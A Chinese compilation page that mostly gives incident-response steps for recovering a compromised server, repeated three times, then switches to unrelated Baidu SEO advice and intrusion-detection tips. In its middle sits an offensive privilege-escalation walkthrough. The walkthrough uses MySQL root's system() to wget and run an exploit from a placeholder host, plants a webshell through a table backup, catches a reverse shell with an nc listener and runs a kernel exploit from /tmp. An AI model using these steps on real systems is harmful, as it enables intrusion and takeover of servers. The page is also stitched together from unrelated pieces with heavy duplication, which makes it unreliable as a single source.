以下是小编帮大家整理的服务器被入侵后的紧急补救方法(共含7篇),欢迎大家收藏分享。同时,但愿您也能像本文投稿人“CD”一样,积极向本站投稿分享好文章。
攻击者入侵某个系统,总是由某个主要目的所驱使的,例如炫耀技术,得到企业机密数据,破坏企业正常的业务流程等等,有时也有可能在入侵后,攻击者的攻击行为,由某种目的变成了另一种目的,例如,本来是炫耀技术,但在进入系统后,发现了一些重要的机密数据,由于利益的驱使,攻击者最终窃取了这些机密数据。
而攻击者入侵系统的目的不同,使用的攻击方法也会不同,所造成的影响范围和损失也就不会相同。因此,在处理不同的系统入侵事件时,就应当对症下药,不同的系统入侵类型,应当以不同的处理方法来解决,这样,才有可能做到有的放矢,达到最佳的处理效果。
一、以炫耀技术为目的的系统入侵恢复
有一部分攻击者入侵系统的目的,只是为了向同行或其他人炫耀其高超的网络技术,或者是为了实验某个系统漏洞而进行的系统入侵活动。对于这类系统入侵事件,攻击者一般会在被入侵的系统中留下一些证据来证明他已经成功入侵了这个系统,有时还会在互联网上的某个论坛中公布他的入侵成果,例如攻击者入侵的是一台 WEB服务器,他们就会通过更改此WEB站点的首页信息来说明自己已经入侵了这个系统,或者会通过安装后门的方式,使被入侵的系统成他的肉鸡,然后公然出售或在某些论坛上公布,以宣告自己已经入侵了某系统。也就是说,我们可以将这种类型的系统入侵再细分为以控制系统为目的的系统入侵和修改服务内容为目的的系统入侵。
对于以修改服务内容为目的的系统入侵活动,可以不需要停机就可改完成系统恢复工作。
1.应当采用的处理方式
(1)、建立被入侵系统当前完整系统快照,或只保存被修改部分的快照,以便事后分析和留作证据。
( 2)、立即通过备份恢复被修改的网页。
(3)、在Windows系统下,通过网络监控软件或“netstat -an”命令来查看系统目前的网络连接情况,如果发现不正常的网络连接,应当立即断开与它的连接。然后通过查看系统进程、服务和分析系统和服务的日志文件,来检查系统攻击者在系统中还做了什么样的操作,以便做相应的恢复。
(4)、通过分析系统日志文件,或者通过弱点检测工具来了解攻击者入侵系统所利用的漏洞。如果攻击者是利用系统或网络应用程序的漏洞来入侵系统的,那么,就应当寻找相应的系统或应用程序漏洞补丁来修补它,如果目前还没有这些漏洞的相关补丁,我们就应当使用其它的手段来暂时防范再次利用这些漏洞的入侵活动。如果攻击者是利用其它方式,例如社会工程方式入侵系统的,而检查系统中不存在新的漏洞,那么就可以不必做这一个步骤,而必需对社会工程攻击实施的对象进行了解和培训。
(5)、修复系统或应用程序漏洞后,还应当添加相应的防火墙规则来防止此类事件的再次发生,如果安装有IDS/IPS和杀毒软件,还应当升级它们的特征库。
(6)、最后,使用系统或相应的应用程序检测软件对系统或服务进行一次彻底的弱点检测,在检测之前要确保其检测特征库是最新的。所有工作完成后,还应当在后续的一段时间内,安排专人对此系统进行实时监控,以确信系统已经不会再次被此类入侵事件攻击。
如果攻击者攻击系统是为了控制系统成为肉鸡,那么,他们为了能够长期控制系统,就会在系统中安装相应的后门程序。同时,为了防止被系统用户或管理员发现,攻击者就会千方百计地隐藏他在系统中的操作痕迹,以及隐藏他所安装的后门。
因而,我们只能通过查看系统进程、网络连接状况和端口使用情况来了解系统是否已经被攻击者控制,如果确定系统已经成为了攻击者的肉鸡,那么就应当按下列方式来进行入侵恢复:
(1)、立即分析系统被入侵的具体时间,目前造成的影响范围和严重程度,然后将被入侵系统建立一个快照,保存当前受损状况,以更事后分析和留作证据,
(2)、使用网络连接监控软件或端口监视软件检测系统当前已经建立的网络连接和端口使用情况,如果发现存在非法的网络连接,就立即将它们全部断开,并在防火墙中添加对此IP或端口的禁用规则。
(3)、通过Windows任务管理器,来检查是否有非法的进程或服务在运行,并且立即结束找到的所有非法进程。但是,一些通过特殊处理的后门进程是不会出现在Windows任务管理器中,此时,我们就可以通过使用一些工具软件来找到这些隐藏的进程、服务和加载的内核模块,然后将它们全部结束任务。
可是,有时我们并不能通过这些方式终止某些后门程序的进程,那么,我们就只能暂停业务,转到安全模式下进行操作。如果在安全模式下还不能结束掉这些后门进程的运行,就只能对业务数据做备份后,恢复系统到某个安全的时间段,再恢复业务数据。
这样,就会造成业务中断事件,因此,在处理时速度应当尽量快,以减少由于业务中断造成的影响和损失。有时,我们还应当检测系统服务中是否存在非法注册的后门服务,这可以通过打开“控制面板”―“管理工具”中的“服务”来检查,将找到的非法服务全部禁用。
(4)、在寻找后门进程和服务时,应当将找到的进程和服务名称全部记录下来,然后在系统注册表和系统分区中搜索这些文件,将找到的与此后门相关的所有数据全部删除。还应将“开始菜单”―“所有程序”―“启动”菜单项中的内容全部删除。
(5)、分析系统日志,了解攻击者是通过什么途径入侵系统的,以及他在系统中做了什么样的操作。然后将攻击者在系统中所做的所有修改全部更正过来,如果他是利用系统或应用程序漏洞入侵系统的,就应当找到相应的漏洞补丁来修复这个漏洞。
如果目前没有这个漏洞的相关补丁,就应当使用其它安全手段,例如通过防火墙来阻止某些IP地址的网络连接的方式,来暂时防范通过这些漏洞的入侵攻击,并且要不断关注这个漏洞的最新状态,出现相关修复补丁后就应当立即修改。给系统和应用程序打补丁,我们可以通过相应的软件来自动化进行。
(6)、在完成系统修复工作后,还应当使用弱点检测工具来对系统和应用程序进行一次全面的弱点检测,以确保没有已经的系统或应用程序弱点出现。我们还应用使用手动的方式检查系统中是否添加了新的用户帐户,以及被攻击做修改了相应的安装设置,例如修改了防火墙过滤规则,IDS/IPS的检测灵敏度,启用被攻击者禁用了的服务和安全软件。
2.进一步保证入侵恢复的成果
(1)、修改系统管理员或其它用户帐户的名称和登录密码;
(2)、修改数据库或其它应用程序的管理员和用户账户名称和登录密码;
(3)、检查防火墙规则;
(4)、如果系统中安装有杀毒软件和IDS/IPS,分别更新它们的病毒库和攻击特征库;
(5)、重新设置用户权限;
(6)、重新设置文件的访问控制规则;
(7)、重新设置数据库的访问控制规则;
(8)、修改系统中与网络操作相关的所有帐户的名称和登录密码等。
当我们完成上述所示的所有系统恢复和修补任务后,我们就可以对系统和服务进行一次完全备份,并且将新的完全备份与旧的完全备份分开保存。
在这里要注意的是:对于以控制系统为目的的入侵活动,攻击者会想方设法来隐藏自己不被用户发现。他们除了通过修改或删除系统和防火墙等产生的与他操作相关的日志文件外,高明的 还会通过一些软件来修改其所创建、修改文件的基本属性信息,这些基本属性包括文件的最后访问时间,修改时间等,以防止用户通过查看文件属性来了解系统已经被入侵。因此,在检测系统文件是否被修改时,应当使用一些软件来进行文件完整性检测。
攻击者入侵某个系统,总是由某个主要目的所驱使的,例如炫耀技术,得到企业机密数据,破坏企业正常的业务流程等等,有时也有可能在入侵后,攻击者的攻击行为,由某种目的变成了另一种目的,例如,本来是炫耀技术,但在进入系统后,发现了一些重要的机密数据,由于利益的驱使,攻击者最终窃取了这些机密数据。
而攻击者入侵系统的目的不同,使用的攻击方法也会不同,所造成的影响范围和损失也就不会相同。因此,在处理不同的系统入侵事件时,就应当对症下药,不同的系统入侵类型,应当以不同的处理方法来解决,这样,才有可能做到有的放矢,达到最佳的处理效果。
一、以炫耀技术为目的的系统入侵恢复
有一部分攻击者入侵系统的目的,只是为了向同行或其他人炫耀其高超的网络技术,或者是为了实验某个系统漏洞而进行的系统入侵活动。对于这类系统入侵事件,攻击者一般会在被入侵的系统中留下一些证据来证明他已经成功入侵了这个系统,有时还会在互联网上的某个论坛中公布他的入侵成果,例如攻击者入侵的是一台 WEB服务器,他们就会通过更改此WEB站点的首页信息来说明自己已经入侵了这个系统,或者会通过安装后门的方式,使被入侵的系统成他的肉鸡,然后公然出售或在某些论坛上公布,以宣告自己已经入侵了某系统。也就是说,我们可以将这种类型的系统入侵再细分为以控制系统为目的的系统入侵和修改服务内容为目的的系统入侵。
对于以修改服务内容为目的的系统入侵活动,可以不需要停机就可改完成系统恢复工作。
1.应当采用的处理方式
(1)、建立被入侵系统当前完整系统快照,或只保存被修改部分的快照,以便事后分析和留作证据。
(2)、立即通过备份恢复被修改的网页。
(3)、在Windows系统下,通过网络监控软件或“netstat -an”命令来查看系统目前的网络连接情况,如果发现不正常的网络连接,应当立即断开与它的连接。然后通过查看系统进程、服务和分析系统和服务的日志文件,来检查系统攻击者在系统中还做了什么样的操作,以便做相应的恢复。
(4)、通过分析系统日志文件,或者通过弱点检测工具来了解攻击者入侵系统所利用的漏洞。如果攻击者是利用系统或网络应用程序的漏洞来入侵系统的,那么,就应当寻找相应的系统或应用程序漏洞补丁来修补它,如果目前还没有这些漏洞的相关补丁,我们就应当使用其它的手段来暂时防范再次利用这些漏洞的入侵活动。如果攻击者是利用其它方式,例如社会工程方式入侵系统的,而检查系统中不存在新的漏洞,那么就可以不必做这一个步骤,而必需对社会工程攻击实施的对象进行了解和培训。
(5)、修复系统或应用程序漏洞后,还应当添加相应的防火墙规则来防止此类事件的再次发生,如果安装有IDS/IPS和杀毒软件,还应当升级它们的特征库。
(6)、最后,使用系统或相应的应用程序检测软件对系统或服务进行一次彻底的弱点检测,在检测之前要确保其检测特征库是最新的,
所有工作完成后,还应当在后续的一段时间内,安排专人对此系统进行实时监控,以确信系统已经不会再次被此类入侵事件攻击。
如果攻击者攻击系统是为了控制系统成为肉鸡,那么,他们为了能够长期控制系统,就会在系统中安装相应的后门程序。同时,为了防止被系统用户或管理员发现,攻击者就会千方百计地隐藏他在系统中的操作痕迹,以及隐藏他所安装的后门。
因而,我们只能通过查看系统进程、网络连接状况和端口使用情况来了解系统是否已经被攻击者控制,如果确定系统已经成为了攻击者的肉鸡,那么就应当按下列方式来进行入侵恢复:
(1)、立即分析系统被入侵的具体时间,目前造成的影响范围和严重程度,然后将被入侵系统建立一个快照,保存当前受损状况,以更事后分析和留作证据。
(2)、使用网络连接监控软件或端口监视软件检测系统当前已经建立的网络连接和端口使用情况,如果发现存在非法的网络连接,就立即将它们全部断开,并在防火墙中添加对此IP或端口的禁用规则。
(3)、通过Windows任务管理器,来检查是否有非法的进程或服务在运行,并且立即结束找到的所有非法进程。但是,一些通过特殊处理的后门进程是不会出现在 Windows任务管理器中,此时,我们就可以通过使用Icesword这样的工具软件来找到这些隐藏的进程、服务和加载的内核模块,然后将它们全部结束任务。
可是,有时我们并不能通过这些方式终止某些后门程序的进程,那么,我们就只能暂停业务,转到安全模式下进行操作。如果在安全模式下还不能结束掉这些后门进程的运行,就只能对业务数据做备份后,恢复系统到某个安全的时间段,再恢复业务数据。
这样,就会造成业务中断事件,因此,在处理时速度应当尽量快,以减少由于业务中断造成的影响和损失。有时,我们还应当检测系统服务中是否存在非法注册的后门服务,这可以通过打开“控制面板”―“管理工具”中的“服务”来检查,将找到的非法服务全部禁用。
(4)、在寻找后门进程和服务时,应当将找到的进程和服务名称全部记录下来,然后在系统注册表和系统分区中搜索这些文件,将找到的与此后门相关的所有数据全部删除。还应将“开始菜单”―“所有程序”―“启动”菜单项中的内容全部删除。
(5)、分析系统日志,了解攻击者是通过什么途径入侵系统的,以及他在系统中做了什么样的操作。然后将攻击者在系统中所做的所有修改全部更正过来,如果他是利用系统或应用程序漏洞入侵系统的,就应当找到相应的漏洞补丁来修复这个漏洞。
如果目前没有这个漏洞的相关补丁,就应当使用其它安全手段,例如通过防火墙来阻止某些IP地址的网络连接的方式,来暂时防范通过这些漏洞的入侵攻击,并且要不断关注这个漏洞的最新状态,出现相关修复补丁后就应当立即修改。给系统和应用程序打补丁,我们可以通过相应的软件来自动化进行。
攻击者入侵某个系统,总是由某个主要目的所驱使的,例如炫耀技术,得到企业机密数据,破坏企业正常的业务流程等等,有时也有可能在入侵后,攻击者的攻击行为,由某种目的变成了另一种目的,例如,本来是炫耀技术,但在进入系统后,发现了一些重要的机密数据,由于利益的驱使,攻击者最终窃取了这些机密数据。
而攻击者入侵系统的目的不同,使用的攻击方法也会不同,所造成的影响范围和损失也就不会相同。因此,在处理不同的系统入侵事件时,就应当对症下药,不同的系统入侵类型,应当以不同的处理方法来解决,这样,才有可能做到有的放矢,达到最佳的处理效果。
一、 以炫耀技术目的的系统入侵恢复
有一部分攻击者入侵系统的目的,只是为了向同行或其他人炫耀其高超的网络技术,或者是为了实验某个系统漏洞而进行的系统入侵活动。对于这类系统入侵事件,攻击者一般会在被入侵的系统中留下一些证据来证明他已经成功入侵了这个系统,有时还会在互联网上的某个论坛中公布他的入侵成果,例如攻击者入侵的是一台 WEB服务器,他们就会通过更改此WEB站点的首页信息来说明自己已经入侵了这个系统,或者会通过安装后门的方式,使被入侵的系统成他的肉鸡,然后公然出售或在某些论坛上公布,以宣告自己已经入侵了某系统。也就是说,我们可以将这种类型的系统入侵再细分为以控制系统为目的的系统入侵和修改服务内容为目的的系统入侵。
对于以修改服务内容为目的的系统入侵活动,可以不需要停机就可改完成系统恢复工作。
1.应当采用的处理方式
(1)、建立被入侵系统当前完整系统快照,或只保存被修改部分的快照,以便事后分析和留作证据。
(2)、立即通过备份恢复被修改的网页。
(3)、在Windows系统下,通过网络监控软件或“netstat -an”命令来查看系统目前的网络连接情况,如果发现不正常的网络连接,应当立即断开与它的连接。然后通过查看系统进程、服务和分析系统和服务的日志文件,来检查系统攻击者在系统中还做了什么样的操作,以便做相应的恢复。
(4)、通过分析系统日志文件,或者通过弱点检测工具来了解攻击者入侵系统所利用的漏洞。如果攻击者是利用系统或网络应用程序的漏洞来入侵系统的,那么,就应当寻找相应的系统或应用程序漏洞补丁来修补它,如果目前还没有这些漏洞的相关补丁,我们就应当使用其它的手段来暂时防范再次利用这些漏洞的入侵活动。如果攻击者是利用其它方式,例如社会工程方式入侵系统的,而检查系统中不存在新的漏洞,那么就可以不必做这一个步骤,而必需对社会工程攻击实施的对象进行了解和培训。
(5)、修复系统或应用程序漏洞后,还应当添加相应的防火墙规则来防止此类事件的再次发生,如果安装有IDS/IPS和杀毒软件,还应当升级它们的特征库。
(6)、最后,使用系统或相应的应用程序检测软件对系统或服务进行一次彻底的弱点检测,在检测之前要确保其检测特征库是最新的。所有工作完成后,还应当在后续的一段时间内,安排专人对此系统进行实时监控,以确信系统已经不会再次被此类入侵事件攻击,
如果攻击者攻击系统是为了控制系统成为肉鸡,那么,他们为了能够长期控制系统,就会在系统中安装相应的后门程序。同时,为了防止被系统用户或管理员发现,攻击者就会千方百计地隐藏他在系统中的操作痕迹,以及隐藏他所安装的后门。
因而,我们只能通过查看系统进程、网络连接状况和端口使用情况来了解系统是否已经被攻击者控制,如果确定系统已经成为了攻击者的肉鸡,那么就应当按下列方式来进行入侵恢复:
(1)、立即分析系统被入侵的具体时间,目前造成的影响范围和严重程度,然后将被入侵系统建立一个快照,保存当前受损状况,以更事后分析和留作证据。
(2)、使用网络连接监控软件或端口监视软件检测系统当前已经建立的网络连接和端口使用情况,如果发现存在非法的网络连接,就立即将它们全部断开,并在防火墙中添加对此IP或端口的禁用规则。
(3)、通过Windows任务管理器,来检查是否有非法的进程或服务在运行,并且立即结束找到的所有非法进程。但是,一些通过特殊处理的后门进程是不会出现在 Windows任务管理器中,此时,我们就可以通过使用Icesword这样的工具软件来找到这些隐藏的进程、服务和加载的内核模块,然后将它们全部结束任务。
可是,有时我们并不能通过这些方式终止某些后门程序的进程,那么,我们就只能暂停业务,转到安全模式下进行操作。如果在安全模式下还不能结束掉这些后门进程的运行,就只能对业务数据做备份后,恢复系统到某个安全的时间段,再恢复业务数据。
这样,就会造成业务中断事件,因此,在处理时速度应当尽量快,以减少由于业务中断造成的影响和损失。有时,我们还应当检测系统服务中是否存在非法注册的后门服务,这可以通过打开“控制面板”―“管理工具”中的“服务”来检查,将找到的非法服务全部禁用。
(4)、在寻找后门进程和服务时,应当将找到的进程和服务名称全部记录下来,然后在系统注册表和系统分区中搜索这些文件,将找到的与此后门相关的所有数据全部删除。还应将“开始菜单”―“所有程序”―“启动”菜单项中的内容全部删除。
(5)、分析系统日志,了解攻击者是通过什么途径入侵系统的,以及他在系统中做了什么样的操作。然后将攻击者在系统中所做的所有修改全部更正过来,如果他是利用系统或应用程序漏洞入侵系统的,就应当找到相应的漏洞补丁来修复这个漏洞。
如果目前没有这个漏洞的相关补丁,就应当使用其它安全手段,例如通过防火墙来阻止某些IP地址的网络连接的方式,来暂时防范通过这些漏洞的入侵攻击,并且要不断关注这个漏洞的最新状态,出现相关修复补丁后就应当立即修改。给系统和应用程序打补丁,我们可以通过相应的软件来自动化进行。
(6)、在完成系统修复工作后,还应当使用弱点检测工具来对系统和应用程序进行一次全面的弱点检测,以确保没有已经的系统或应用程序弱点出现。我们还应用使用手动的方式检查系统中是否添加了新的用户帐户,以及被攻击做修改了相应的安装设置,例如修改了防火墙过滤规则,IDS/IPS的检测灵敏度,启用被攻击者禁用了的服务和安全软件。
入侵提权的方法有很多种,最常用的是使用各种工具进行入侵提权了,下面我来给大家总结一些方法,
利用mysql root提权方法
mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般。今天我们换一种方式。
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,好比,下载exp执行, 搞到 root权限,然后装后门
mysql>system wget www.xxx.com/xxxx ;
mysql>system chmod +x xxxx; mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh连接上去,输入mysql的用户密码,ok,搞 定。
Linux低权限提权
反弹试试 tmp里创建好文件,SHELL目录传马,执行,本地NC监听上线,WHOAMI一下,是WWWROOT权限
查看版本
可以CD到根目录上级(/var/www/virtual/),再LS一下,全盘网站都出来了,目标站也没瞎起文件夹名,但是没权限跳不进去
试着TAR打包,没权限,试着单独打包目标站目录文件,可以,但是根目录CONN.CONFIG被限制当前目标站可读权限。
尝试CP目标站include目录,竟然可以复制过来,但是不可写复制不过去,找到了数据库配置信息,再另外服务器上。
先把数据库用phpspyshell备份过来:
查看到一些配置信息跟账号,但是没有后台路径等敏感信息
扫描工具扫不到目标网站文件夹,估计修改过了
试着提权CMDSHELL为USER或者ROOT,没有直接去看Apache的配置设置,试着WGET几个EXP,但是都没用,估计打过补丁
CP虽然可以,但是不知道具体的信息
既然WEB没权限,就试着MYSQL看看有没有权限吧
直接
CREATE TABLE hackdn (spider BLOB);创建表hackdn
插一句话
保存
然后备份成目标路径1.php文件,
发现连接不了。
CP过来一看,被反译符分隔了,
不加 ‘ 的话,就插入
再备份为PHP后,本地保存以下代码为
代码如下复制代码
1.HTML
拿到shell了,准备提权.先看下linux内核
uname -a
2.6.18-194.11.3.el5 内核 的,这个好CentOS release 5.5好提
然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢?
因为tmp目录可写可执行一般,继续ing.
找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666
然后再点你shell
连接成功就出现下面的内容
然后我们进到/tmp目录
cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194
我这里有权限rwx,可读可写可执行.如果没有权限chmod -R 777 文件名
我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了
成功了。。 其实linux提权还是很简单,关键看有没exp... 完了 完了 !!!!!
先例举下类似于百度K首页的情况: 1、一个月之内的新站,百度一直不收录首页,其它页面收录正常; 2、一个月以上的老站,百度以前...
先例举下类似于百度K首页的情况:
1、一个月之内的新站,百度一直不收录首页,其它页面收录正常;
2、一个月以上的老站,百度以前收录正常,突然有一天site不到首页,但是直接用网址的形式能搜索到首页;
3、站点在百度收录一直正常,突然有一天出现了“贞子现象”,也就是首页在一天内的一段时间里在百度里出现正常排名及能够用网址的形式能搜索到首页;基本上cnzhanzhang目前能想到的就现在的三种情况,
更多的细节及相关的解决办法:
1、百度被K首页符合以上第1种情况:一个月之内的新站,百度一直不收录首页,其它页面收录正常。
a:出现这种情况,最大的可能性就是首页优化过度。如果网站可能有这种情况。
建议解决办法:有必要降低首页的SEO痕迹,如清除H1标签、降低关键词密度以及对加粗标签等的使用次数进行降低。
b:首页链接中有被百度降权的站点。直接用网址的形式查首页的友情链接,看是否有记录,如果出现无记录的情况,说明百度已经K了此站(可用site:xxx.com进行再确认)或者已经对其降权。
建议解决办法:这样的情况应该及时对降权的友情链接进行删除,否则情况严重的可能导致你的站被K!
2、百度被K首页符合以上第2种情况:一个月以上的老站,百度以前收录正常,突然有一天site不到首页,但是直接用网址的形式能搜索到首页。
a:首页突然从百度消失,并持续三天以上,前提是百度基本上一周最少更新你的站两次以上(如果不是这样,那么观察期相应适当放长)。如果是三天以上你的站首页从来没有在百度site记录里出现过,那么基本上可以认为你的站已经被降权,这期间如果还出现了收录减少,并且持续减少,每天以百页数减少,这种情况下的站可能面临被K了,而且有可能表现为你的站排名并没有掉。
建议解决办法:请首先检查你的IP下的其它站点是否有相同的情况,如果有相当部分的站点是这种情况,建议尽快换空间,这个IP可能被百度惩罚了。
b:如果上述A情况基本相符,那么你最近一周左右的时间有增加首页的链接,而且接下来可能就出现了降权或者首页消失。(关于因为友情连接被K可以参见 真实实例谈谈友情链接的作用:(网站推广www.51hlht.com)
建议解决办法:老站的链接出问题其实跟第一种情况的B类似,所以按上面的办法检查网站链接,进行清理,
3、百度被K首页符合以上第3种情况:站点在百度收录一直正常,突然有一天出现了“贞子现象”,也就是收录及更新都很正常,首页在一天内的一段时间里在百度里出现正常排名,并能够用网址的形式能搜索到首页。但时间一过,就site不到,用网址的形式也不能搜索到首页。
a:如果是一个新站,如果可以明确自己没做过SEO优化(网站推广www.51hlht.com),那么很有可能是属于链接牵连,如果你有加友情链接的话,不管是链接自动交换的形式,还是自己的首页链接,都有可能导致一个新站的首页出现这样的情况。
建议解决办法:将所有可能出现的友情链接删除,首页友情链接也清理掉。观察一周左右。因为大多数时候有可能你第一天加的链接,第二天百度对其降权,你的首页就牵连了。所以大多数SEO会建议对一个链接站进行长达半个月的观察。(核桃碰到过这种情况,当时做一个词,链接了一个百度排名第一的站,链接的第三天这个站被百度K掉首页,后来我的站首页直接也被K掉了,我删掉链接后,重新出现,那个原来排名第一的站一周之内就被清空了。汗~!)
b:如果是一个老站(网站推广www.51hlht.com),并且降权K首页之前有进行SEO优化,表现为修改首页TITLE,关键字布局强化,各种H系列等加重标签的增加等等,那么有可能是属于优化过度。
建议解决办法:降低SEO程度。也许还有链接的情况,请参照a的办法。
基本上上面的情况都有些类似,总结下来几点:
1、新站请小心做链接,老站请定期检查链接。如果你实力不够的话,百度对其不友好的站不要跟它做链接。
2、优化适可而行,不要太过分。百度对SEO太过分的站惩罚越来越重,特别是做那种前10全为推广的词,如果优化过度,可能直接K站,也许没有任何能挽救的机会。
3、如果你的站是由于换空间之类的突然有间接性不能访问空间的原因引起的首页消失,想办法让你的首页更多地让百度找到,加速其对你的重新索引。
4、如果可以肯定不是由于SEO优化过度的原因,不要在被降权的时间进行大规模的首页内容变动。如修改标题,KEYWORDS,或者进行改版等等。建议去改善你的链接及努力更新好的内容,适当找一些好的站进行交换。
5、找时间检查你的服务器IP下站点收录的情况。有的时候邻居家里有炸弹,会把你家的房子也毁了!
6、见机行事,在感到无力回天的时候,换域名重新再来。或者再开一个新站,老站放着,毕竟还有GG没对你进行惩罚,尽量让损失减轻。有的时候一个新站发展的机会远比你对老站进行抢救的机会要大得多。
入侵检测系统(IDS)是防火墙的合理补充,它帮助安全系统发现可能的入侵前兆,并对付网络攻击,入侵检测系统能在不影响网络性能的情况下对网络进行监测,提供对内部攻击、外部攻击和误操作的实时保护,能够扩展系统管理员的安全管理能力(包括安全审计、监视、进攻识别和响应),提高了信息安全基础结构的完整性。但是,入侵检测系统并不是万能的,高昂的价格也让人退却,而且,单个服务器或者小型网络配置入侵检测系统或者防火墙等投入也太大了。
一、对于WWW服务入侵的前兆检测
对于网络上开放的服务器来说,WWW服务是最常见的服务之一。基于80端口的入侵也因此是最普遍的,
很多sceipt kids就对修改WEB页面非常热衷。WWW服务面对的用户多,流量相对来说都很高,同时WWW服务的漏洞和相应的入侵方法和技巧也非常多,并且也相对容易,很多“ ”使用的漏洞扫描器就能够扫描80端口的各种漏洞,比如wwwscan 、X-scanner等,甚至也有只针对80端口的漏洞扫描器。Windows系统上提供WWW服务的IIS也一直漏洞不断,成为系统管理员头疼的一部分。
虽然80端口入侵和扫描很多,但是80端口的日志记录也非常容易。IIS提供记录功能很强大的日志记录功能。在“Internet 服务管理器”中站点属性可以启用日志记录。默认情况下日志都存放在%WinDir%System32LogFiles,按照每天保存在exyymmdd.log文件中。这些都可以进行相应配置,包括日志记录的内容。
在配置IIS的时候应该让IIS日志尽量记录得尽量详细,可以帮助进行入侵判断和分析。现在我们要利用这些日志来发现入侵前兆,或者来发现服务器是否被扫描。打开日志文件,我们能够得到类似这样的扫描记录(以Unicode漏洞举例):
鉴别Unix系统是否被入侵,需要较高的技巧,当然也有一些非常简单的方法,
简单的方法就是检查系统日志、进程表和文件系统,查看是否存在一些“奇怪的”消息、进程或者文件。例如:
两个运行的inetd进程(应该只有一个);
.ssh以root的EUID运行而不是以root的UID运行;
在“/”下的RPC服务的核心文件;
新的setuid/setgid程序;
大小迅速增长的文件;
df和du的结果不相近;
perfmeter/top/BMC Patrol/SNMP(以上都是一些监控的程序)的监视器与vmstat/ps的结果不符,远高于平时的网络流量;
dev下的普通文件和目录条目,尤其是看起来名称比较正常的;
/tc/passwd和/etc/shadow,下是否有不正常或者没有密码的账号存在;
/tmp、/var/tmp和其他有可写权限的目录下的奇怪文件名,这里所指的奇怪是指名字类似于“…”的(3个点),
如果您发现这样的名称,但实际上却是个目录的话,那么你的系统十有八九存在问题。
也要注意查看/.rhosts,/etc/hosts.equiv,/.ssh/known_hosts和~/.rhosts,看看是否有不合适的新条目存在。
另外,还要密切注意那些隐蔽的信任关系。例如,NFS上主机之间是怎么挂载的?哪台主机有关于别的主机的.hosts、.shosts和hosts.equiv条目?哪台主机有.netrc文件?该主机与谁共享网段?您应该继续对它做一番调查。通常攻击者不止破坏一台主机,他们从一台主机跳到另一台,隐藏好踪迹,并开放尽可能多的后门。
如果您有任何可疑的发现,那么请联系您的本地计算机紧急事件响应小组,来帮助检查网络的其他主机,并恢复受损站点。
★ linux中centos被入侵后的检查linux操作系统
★ 被伤后励志的句子
